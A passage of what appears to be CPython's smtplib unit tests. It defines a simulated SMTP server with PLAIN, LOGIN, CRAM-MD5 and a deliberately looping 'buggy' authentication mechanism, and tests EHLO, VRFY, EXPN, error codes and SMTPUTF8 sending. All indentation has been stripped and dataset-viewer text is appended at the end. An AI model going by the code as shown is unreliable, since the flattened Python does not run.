sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_buggy(self, arg=None):
# This AUTH mechanism will 'trap' client in a neverending 334
# base64 encoded 'BuGgYbUgGy'
self.push('334 QnVHZ1liVWdHeQ==')
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No db for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No db for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT
)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.